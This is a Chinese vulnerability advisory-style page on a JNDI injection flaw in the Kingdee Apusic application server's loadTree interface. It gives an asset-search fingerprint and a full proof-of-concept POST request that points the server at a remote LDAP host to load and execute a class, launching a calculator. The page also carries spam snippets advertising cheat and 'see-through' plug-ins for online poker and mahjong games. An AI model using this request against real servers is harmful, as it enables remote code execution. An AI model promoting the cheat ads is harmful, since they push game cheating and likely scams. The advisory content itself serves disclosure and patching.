金蝶Apusic应用服务器 loadTree JNDI注入漏洞
创始人
2025-01-16 13:36:29
0

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1 Host: your_ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 55  jndiName=ldap://***.***.***.***/Basic/Command/calc 

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

相关内容

热门资讯

透视手段!wepoker有没有... 透视手段!wepoker有没有挂(透视)开挂脚本app(哔哩哔哩)wepoker有没有挂能透视中分为...
第二分钟方针!pokemmo手... 您好,pokemmo手机辅助软件这款游戏可以开挂的,确实是有挂的,需要了解加去威信【48527505...
今天下午"青山晃晃辅... 今天下午"青山晃晃辅助器"确实是有辅助插件(详细教程)-哔哩哔哩小薇(辅助器软件下载)致您一封信;亲...
1分钟脚本!超圣大厅可控是什么... 1分钟脚本!超圣大厅可控是什么意思,樱花之盛低价挂(一直真的有辅助app)-哔哩哔哩一、超圣大厅可控...
7分钟总结!wepoker有辅... 7分钟总结!wepoker有辅助器吗(透视)一直存在有辅助下载(哔哩哔哩)1、超多福利:超高返利,海...
透视技法!wepoker辅助工... 透视技法!wepoker辅助工具(透视)开挂脚本软件(哔哩哔哩)1、下载好wepoker辅助工具正确...
今天下午"川南九九辅... 今天下午"川南九九辅助"本来存在有辅助技巧(有挂教程)-哔哩哔哩1、川南九九辅助有没有辅助教程、川南...
5分钟辅助!微信小程序游戏破解... 5分钟辅助!微信小程序游戏破解微乐辅助,闲来辅助神器(果然有挂辅助下载)-哔哩哔哩1、进入游戏-大厅...
第1分钟要领!wpk私人局有透... 第1分钟要领!wpk私人局有透视吗(透视)真是有辅助透视(哔哩哔哩)1、用户打开应用后不用登录就可以...
透视办法!hhpoker透视脚... 透视办法!hhpoker透视脚本视频(透视)开挂脚本安装(哔哩哔哩)一、hhpoker透视脚本视频游...